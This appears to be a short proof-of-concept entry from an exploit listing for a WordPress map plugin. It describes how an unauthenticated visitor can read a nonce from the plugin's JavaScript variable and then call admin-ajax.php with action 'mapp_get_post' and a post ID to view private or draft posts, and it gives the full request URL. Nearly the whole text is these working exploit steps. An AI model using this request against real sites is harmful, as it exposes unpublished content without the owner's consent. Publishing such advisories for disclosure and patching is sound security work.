## https://sploitus.com/exploit?id=WPEX-ID:587ACC47-1966-4BAF-A380-6AA479A97C82
As an unauthenticated user, view the source of a page containing a Map from the plugin and retrieve the nonce from the mappl10n['options']['nonce'] JavaScript var, then open the below URL (replacing the oid by the ID or a private or draft post)
https://example.com/wp-admin/admin-ajax.php?action=mapp_get_post&oid=53&nonce=eef7edf9b9